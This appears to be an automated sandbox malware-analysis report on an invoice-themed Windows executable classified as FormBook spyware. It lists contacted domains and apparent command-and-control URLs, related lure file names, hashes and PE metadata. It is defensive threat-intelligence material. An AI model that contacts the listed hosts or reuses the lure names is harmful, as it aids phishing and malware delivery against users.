                                                        https://ac.ecosia.org/autocomplete?q=TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.turbonotes.apptStjsTMXwkdtbv.exe, 00000007.00000002.4161197958.000000000532C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6TapiUnattend.exe, 00000006.00000002.4160033591.0000000004B94000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003EF4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbTapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        156.242.132.82
                                                        www.shanhaiguan.netSeychelles
                                                        132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                        136.143.186.12
                                                        zhs.zohosites.comUnited States
                                                        2639ZOHO-ASUSfalse
                                                        199.192.21.169
                                                        www.selftip.topUnited States
                                                        22612NAMECHEAP-NETUSfalse
                                                        44.213.25.70
                                                        newdaydawning.netUnited States
                                                        14618AMAZON-AESUSfalse
                                                        44.207.39.65
                                                        cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                                        14618AMAZON-AESUSfalse
                                                        172.67.181.150
                                                        www.aaavvejibej.bondUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        217.70.184.50
                                                        webredir.vip.gandi.netFrance
                                                        29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                        3.33.130.190
                                                        crowsecurity.cloudUnited States
                                                        8987AMAZONEXPANSIONGBfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1519458
                                                        Start date and time:2024-09-26 15:16:56 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 10m 31s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:NVOICE FOR THE MONTH OF AUG-24.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@13/8
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 91%
                                                        • Number of executed functions: 53
                                                        • Number of non-executed functions: 301
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: NVOICE FOR THE MONTH OF AUG-24.exe
                                                        TimeTypeDescription
                                                        09:19:12API Interceptor9563174x Sleep call for process: TapiUnattend.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        156.242.132.82DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.shanhaiguan.net/p2q3/
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • www.shanhaiguan.net/p2q3/
                                                        136.143.186.12DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.lanxuanz.tech/ivo1/
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • www.lanxuanz.tech/ivo1/
                                                        x.exeGet hashmaliciousFormBookBrowse
                                                        • www.lanxuanz.tech/em49/
                                                        bin.exeGet hashmaliciousFormBookBrowse
                                                        • www.lanxuanz.tech/em49/
                                                        PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                        • www.jrksa.info/nq8t/
                                                        w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                        • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                                        RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                        • www.jrksa.info/nq8t/
                                                        RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                        • www.jrksa.info/nq8t/
                                                        H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                        • www.jrksa.info/mcz6/
                                                        RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                                        • www.jrksa.info/nq8t/
                                                        199.192.21.169RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                        • www.zenscape.top/d8cw/
                                                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                        • www.zenscape.top/d8cw/
                                                        DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.selftip.top/85su/
                                                        DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                        • www.urbanpulse.help/r50h/
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • www.selftip.top/85su/
                                                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                        • www.zenscape.top/d8cw/
                                                        file.exeGet hashmaliciousFormBookBrowse
                                                        • www.urbanpulse.help/r50h/
                                                        INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.cenfresh.life/6iok/
                                                        44.213.25.70RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/paa2/
                                                        PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/q1on/
                                                        inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/paa2/
                                                        HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/paa2/
                                                        NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/paa2/
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • www.newdaydawning.net/72tr/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        webredir.vip.gandi.netCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        PO098765678.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • 217.70.184.50
                                                        www.aaavvejibej.bondDEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.181.150
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.31.249
                                                        zhs.zohosites.comDEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        x.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        bin.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.180.12
                                                        eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.180.12
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        POWERLINE-AS-APPOWERLINEDATACENTERHKrAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                        • 45.114.171.236
                                                        oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        file.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        file.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 160.124.205.227
                                                        Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        SecuriteInfo.com.Linux.Siggen.9999.6095.9527.elfGet hashmaliciousMiraiBrowse
                                                        • 156.244.234.131
                                                        AMAZON-AESUShttp://erptanacsadas.hu.pages.services/secure-business-document/?ts=1726767567620Get hashmaliciousHtmlDropperBrowse
                                                        • 18.234.10.85
                                                        RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                        • 44.213.25.70
                                                        https://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                                                        • 3.221.8.11
                                                        https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 54.81.180.79
                                                        HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                                        • 54.144.73.197
                                                        Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                        • 52.5.13.197
                                                        H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                        • 34.205.242.146
                                                        mfsH98ISNV.exeGet hashmaliciousUnknownBrowse
                                                        • 3.80.28.180
                                                        http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                                        • 3.5.21.101
                                                        http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                        • 3.5.8.150
                                                        ZOHO-ASUSDEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        https://linklock.titanhq.com/analyse?url=https%3A%2F%2Femaze.me%2Fzinninsurance%23untitled2&data=eJxdjMEKwjAQRL-mOYa20RgPOXgpVUT8hbgJGEw2ZbNB6NebszCHN_BmwGp1Pk1HbUZtzCS8hYK1JQYXSELJItv5vj4q4fN6W7-iWiqviMNhpOY_ETcqvgHHvpIYWJCFlEtCR135_2r2zbzVQV2GeekJ2e1B5tBxj4ix2-QQelcNOXIKfv4BXds4OQ%%Get hashmaliciousUnknownBrowse
                                                        • 204.141.43.190
                                                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        x.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        bin.exeGet hashmaliciousFormBookBrowse
                                                        • 136.143.186.12
                                                        https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                                                        • 136.143.191.172
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                        • 165.173.254.246
                                                        https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                        • 204.141.42.213
                                                        https://insights.zohorecruit.com/ck1/2d6f.390d3f0/fab65c60-5e29-11ef-896b-525400d6cd4f/02e60029eb3c4e09f8e3cb9644fa23262f52aa86/2?e=arqOrxEM1Pu0aMl2J4DeUujZWH3TPRnuK%2F%2F50IkkynofyG9S9LzMCQGQeD3A8%2BvCqigeqgLnvt4AorXAOg1unw%3D%3DGet hashmaliciousUnknownBrowse
                                                        • 204.141.42.213
                                                        http://workdrive.zohoexternal.comGet hashmaliciousUnknownBrowse
                                                        • 204.141.43.16
                                                        NAMECHEAP-NETUShttps://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 162.0.228.73
                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                        • 63.250.47.40
                                                        ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.236.169
                                                        https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29tGet hashmaliciousHTMLPhisherBrowse
                                                        • 198.54.115.105
                                                        https://recommendationshaft-facc4a.ingress-comporellon.ewp.live/wp-content/plugins/Suspendisse-vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.6
                                                        https://zerovoid-voidic-facc4a.ingress-erytho.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.132
                                                        https://yw2tr-d6987d.ingress-bonde.ewp.live/wp-content/plugins/deviswetransfer%202/log.phpGet hashmaliciousUnknownBrowse
                                                        • 63.250.43.2
                                                        https://dji.repair/wnfslydy.phpGet hashmaliciousUnknownBrowse
                                                        • 162.0.238.241
                                                        inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 192.64.117.204
                                                        PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.238.43
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\TapiUnattend.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288768
                                                        Entropy (8bit):7.994819148869026
                                                        Encrypted:true
                                                        SSDEEP:6144:5DfcRn5WxoqTl0nkjobYHEIEpWHwG5zqMSkhvqbGKaZBrMdbluM0+HA:5It5Wx1ZjFHEIECwG5zRSkdtZZBAVlun
                                                        MD5:91271AFE2548F4269FAC862A6084B69A
                                                        SHA1:758D2AA42BB9BC3E208FFF1525C16AA3E09E1F5C
                                                        SHA-256:6F661746BD8D582E2507281FF5274590E19D11068CA2C2E5F65B4E51B60FBB02
                                                        SHA-512:A60E7911C5CE63384A09562C8C645665C5C6FCFC4D0167056BF7148A4CB18F9003D0B590721B25AAF93B0B62466ECA0CD265E129EC158E3ABB60F036480C110A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.o.a.6YUOa..B..p.0F....I=...V3E6YUO92TKNETGLA0ECW31J5EX5V3.6YUA&.ZK.L.f.@|.b.[X9.5*Z1A$[y6.W\;?n'1g>4^e*9.u.fe5Z2Vk;T_k92TKNET>MH.x#0..*R.eU1._..uYU.Q..{,&._....*R..\5[xV>.O92TKNET..A0.BV3..U.X5V3E6YU.90U@ONTG.E0ECW31J5E8!V3E&YUOI6TKN.TG\A0EAW37J5EX5V3C6YUO92TK>ATGNA0ECW33Ju.X5F3E&YUO9"TK^ETGLA0UCW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92Te: ,3LA0..S31Z5EXcR3E&YUO92TKNETGLA0eCWS1J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0ECW31J5EX5V3E6YUO92TKNETGLA0
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.540979536608941
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:NVOICE FOR THE MONTH OF AUG-24.exe
                                                        File size:1'361'303 bytes
                                                        MD5:8f28011c24818124770ba3d2af3591b1
                                                        SHA1:b619d4d9ffb5ce1a5baed19a463ea792127bc5ec
                                                        SHA256:7c43c4fb39ad14b2de1dfa864eda67bddb6536b709e86650b55009c2ff1c48d5
                                                        SHA512:a17cf9a4cf45409bee354945421b29c9182ac5b09db895bdded782e93cf4615b519b4f8ea6e10434986a994bd52b7d5f59038360310d7db9f5e63064360ba3dc
                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCWHaD+74Bd2e8mbfPc8bB+od8SeCWPhI6KIbE2Tiz:7JZoQrbTFZY1iaCW6Dtz2BmXBJeCMKS0
                                                        TLSH:FF55F222F5D68036C2F322B19E7EF76A963D79360326D1D727C82D251E601816F3A772
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                        Icon Hash:1733312925935517
                                                        Entrypoint:0x4165c1
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                        Instruction
                                                        call 00007F697099DE5Bh
                                                        jmp 00007F6970994CCEh
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [ebp+0Ch]
                                                        mov ecx, dword ptr [ebp+10h]
                                                        mov edi, dword ptr [ebp+08h]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F6970994E4Ah
                                                        cmp edi, eax
                                                        jc 00007F6970994FE6h
                                                        cmp ecx, 00000080h
                                                        jc 00007F6970994E5Eh
                                                        cmp dword ptr [004A9724h], 00000000h
                                                        je 00007F6970994E55h
                                                        push edi
                                                        push esi
                                                        and edi, 0Fh
                                                        and esi, 0Fh
                                                        cmp edi, esi
                                                        pop esi
                                                        pop edi
                                                        jne 00007F6970994E47h
                                                        jmp 00007F6970995222h
                                                        test edi, 00000003h
                                                        jne 00007F6970994E56h
                                                        shr ecx, 02h
                                                        and edx, 03h
                                                        cmp ecx, 08h
                                                        jc 00007F6970994E6Bh
                                                        rep movsd
                                                        jmp dword ptr [00416740h+edx*4]
                                                        mov eax, edi
                                                        mov edx, 00000003h
                                                        sub ecx, 04h
                                                        jc 00007F6970994E4Eh
                                                        and eax, 03h
                                                        add ecx, eax
                                                        jmp dword ptr [00416654h+eax*4]
                                                        jmp dword ptr [00416750h+ecx*4]
                                                        nop
                                                        jmp dword ptr [004166D4h+ecx*4]
                                                        nop
                                                        inc cx
                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                        inc cx
                                                        add byte ptr [ebx], ah
                                                        ror dword ptr [edx-75F877FAh], 1
                                                        inc esi
                                                        add dword ptr [eax+468A0147h], ecx
                                                        add al, cl
                                                        jmp 00007F6972E0D647h
                                                        add esi, 03h
                                                        add edi, 03h
                                                        cmp ecx, 08h
                                                        jc 00007F6970994E0Eh
                                                        rep movsd
                                                        jmp dword ptr [00000000h+edx*4]
                                                        Programming Language:
                                                        • [ C ] VS2010 SP1 build 40219
                                                        • [C++] VS2010 SP1 build 40219
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2010 SP1 build 40219
                                                        • [RES] VS2010 SP1 build 40219
                                                        • [LNK] VS2010 SP1 build 40219
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
